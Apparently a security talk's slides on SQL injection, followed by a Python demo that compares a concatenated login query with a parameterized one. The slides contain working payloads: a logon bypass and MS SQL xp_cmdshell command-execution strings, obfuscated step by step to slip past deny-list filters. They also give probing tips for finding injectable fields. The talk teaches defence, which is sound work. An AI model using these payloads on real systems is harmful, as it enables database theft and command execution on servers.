How Did I Steal Your Database Mostafa Siraj @mostafasiraj
Agenda Noooo, it kills suspense
DISCLAIMER Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account
SQL Injection What is it? The application dynamically generates an SQL query based on user input, but it does not sufficiently prevent that input from modifying the intended structure of the query.
SQL Injection Example, Bypassing Logon
String sqlQuery = "SELECT * FROM user WHERE name = '" + username + "' AND pass='" + password + "'" …..
SELECT * FROM user WHERE name = 'Mostafa' AND pass='' OR '1'='1'
MS SQL Server: Execute OS command xp_cmdshell
Set username to '; exec master.dbo.xp_cmdshell "dir";-- produces
SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; --
Note: dir lists directory content
Let's play Hide and Seek
Original: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; --
Defender: Disallow double quotes
Attacker: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell dir; --
Defender: Filter out string “xp_cmdshell”
Attacker: ';declare @a varchar(1000); set @a = 'master.dbo.xp_' + 'cmdshell dir'; exec (@a);--
Defender: Filter out “xp”, “cmd”, “shell”, ….
Attacker: ';declare @a varchar(1000); set @a = reverse('rid llehsdmc_px.obd.retsam'); exec (@a);--
Finding SQL Injection Bugs
Submit two single quotation marks and observe the result
Identify the database (e.g. Oracle: '||'FOO, MS-SQL: '+'FOO, MySQL: ' 'FOO [note the space between the two quotes])
Finding SQL Injection Bugs
For search fields try using the wildcard character %
Inject into different statement types
Watch out when injecting in UPDATE or DELETE
Demo HacmeBank
Demo Using UNION Operator

Process SQL queries using prepared statements, parameterized queries, or stored procedures.
Enforce least privilege
Avoid detailed error messages
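Added example (not part of the original slides): the concatenated logon query from the "Bypassing Logon" slide beside a parameterized version, plus the "Hide and Seek" deny-lists checked against the slide's own strings. It assumes Python's sqlite3 as a stand-in database; the table contents, password value and function names are constructed for illustration.

```python
import sqlite3

# Usernames quoted from the "Hide and Seek" slide; on MS SQL Server each one
# closes the string literal and appends a second statement.
HIDE_AND_SEEK = [
    "'; exec master.dbo.xp_cmdshell \"dir\";--",
    "'; exec master.dbo.xp_cmdshell dir; --",
    "';declare @a varchar(1000); set @a = 'master.dbo.xp_' + 'cmdshell dir'; exec (@a);--",
    "';declare @a varchar(1000); set @a = reverse('rid llehsdmc_px.obd.retsam'); exec (@a);--",
]
# The slide's three defender filters, in order (applied cumulatively here).
DENY_ROUNDS = [['"'], ["xp_cmdshell"], ["xp", "cmd", "shell"]]


def make_db():
    """In-memory SQLite stand-in with one constructed account.
    Plain-text 'pass' mirrors the slide's schema; real systems store a hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT PRIMARY KEY, pass TEXT NOT NULL)")
    conn.execute("INSERT INTO user VALUES (?, ?)", ("Mostafa", "constructed-pw"))
    return conn


def login_concat(conn, username, password):
    """Vulnerable: the slide's string concatenation, input becomes SQL syntax."""
    sql = ("SELECT * FROM user WHERE name = '" + username +
           "' AND pass='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_param(conn, username, password):
    """Hardened: placeholders bind input as values, the query shape is fixed."""
    sql = "SELECT * FROM user WHERE name = ? AND pass = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def denylist_results():
    """For each defender round, does the attacker's next string pass the filter?"""
    banned, results = [], []
    for extra, payload in zip(DENY_ROUNDS, HIDE_AND_SEEK[1:]):
        banned += extra
        results.append(not any(b in payload.lower() for b in banned))
    return results


if __name__ == "__main__":
    db = make_db()
    print("concat, bypass input: ", login_concat(db, "Mostafa", "' OR '1'='1"))
    print("param,  bypass input: ", login_param(db, "Mostafa", "' OR '1'='1"))
    print("param,  real password:", login_param(db, "Mostafa", "constructed-pw"))
    print("deny-list passed by next payload:", denylist_results())
    print("param, hide-and-seek names:",
          [login_param(db, u, "") for u in HIDE_AND_SEEK])
```

Every deny-list round is passed by the next string on the slide, while the parameterized query treats all of them as a username that simply does not exist.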